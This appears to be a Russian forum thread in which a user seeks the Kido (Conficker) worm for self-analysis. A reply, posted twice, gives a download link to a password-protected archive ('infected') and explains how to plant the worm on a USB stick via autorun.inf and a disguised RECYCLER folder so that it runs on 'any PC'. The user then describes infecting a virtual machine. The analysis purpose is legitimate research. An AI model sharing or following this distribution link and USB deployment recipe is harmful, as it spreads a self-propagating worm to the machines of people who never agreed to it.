разыскиваю вирус Kido для самостоятельного анализа
Не один день разыскиваю вирус Kido. Хотелось бы глянуть за его сетевой активностью. Однако все пришедшие мне с флэшками образцы почему-то не размножались. Все найденное на Malwaresearch.com при запуске выдавало сообщение “программа не умещается в памяти”. Честно сознаюсь, dll найденную в этом разделе пока никак не могу запустить. Просто исполняемый файлик есть?
http://rapidshare.com/files/186243825/danger.zip
password: infected
Put autorun.inf file on a USB stick. Then create a folder named "RECYCLER" on USB stick.
Then create another foilder named "S-5-3-42-2819952290-8240758988-879315005-3665" inside this RECYCLER folder.
U r ready to go. Plugin this USB device to any PC and click on it. Do it on ur own risk.
http://rapidshare.com/files/186243825/danger.zip
password: infected
Put autorun.inf file on a USB stick. Then create a folder named "RECYCLER" on USB stick.
Then create another foilder named "S-5-3-42-2819952290-8240758988-879315005-3665" inside this RECYCLER folder.
U r ready to go. Plugin this USB device to any PC and click on it. Do it on ur own risk.
Заразил виртуалку XP SP2. По началу ProcMon показал активность и все, тишина. Ни на флешки, ни по сети дальше не ползет. Может его надо еще и спровоцировать или таймбомб уже дезактивирован?!